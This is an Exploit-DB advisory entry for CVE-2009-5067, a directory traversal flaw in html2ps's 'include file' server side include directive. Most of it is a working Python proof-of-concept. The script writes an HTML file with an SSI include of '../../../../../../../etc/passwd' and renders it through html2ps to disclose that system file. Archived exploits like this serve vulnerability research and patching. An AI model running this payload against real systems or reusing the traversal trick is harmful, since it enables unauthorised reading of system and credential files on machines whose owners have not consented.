html2ps - 'include file' Server Side Include Directive Directory Traversal Vulnerability

2009-09-25T00:00:00
ID EDB-ID:10012
Type exploitdb
Reporter epiphant
Modified 2009-09-25T00:00:00

Description

html2ps - 'include file' Server Side Include Directive Directory Traversal Vulnerability. CVE-2009-5067. Webapps exploits for multiple platform

                                        
                                            #!/usr/bin/env python
#
# html2ps <= 1.0 beta5 arbitrary file disclosure
# http://user.it.uu.se/~jan/html2ps.html
# author: epiphant <epiphant.0@gmail.com>
#
# the "include file" ssi directive doesn't check for directory
# traversal so you can include and disclose any file in the
# dir tree (very handy when html2ps is running as a part of a
# web app with data that you control)
# the vuln requires that "ssi" in the @html2ps block in the
# html2psrc file is set to 1, which is the default
#
# bonus info: some of the backtick operators look shady too
# but will require lots of prerequisites so they're uncool
#
# shouts: thcx labs, zybadawg333, fabiodds, str0ke
# jan k: shame on you - your perl is very ugly
#

import os

d = """\
<html>
<head>
<title>epiphant</title>
</head>
<body>
<h1>epiphant</h1>
<!--#include file="../../../../../../../etc/passwd"-->
<p>epiphant</p>
</body>
</html>
"""

try:
  fi = open("epiphant.html", "w")
  fi.write(d)
  fi.close()
except:
  print "can't write here"
  exit(1)

os.system("html2ps epiphant.html > epiphant.ps")
os.system("gv epiphant.ps")
exit(0)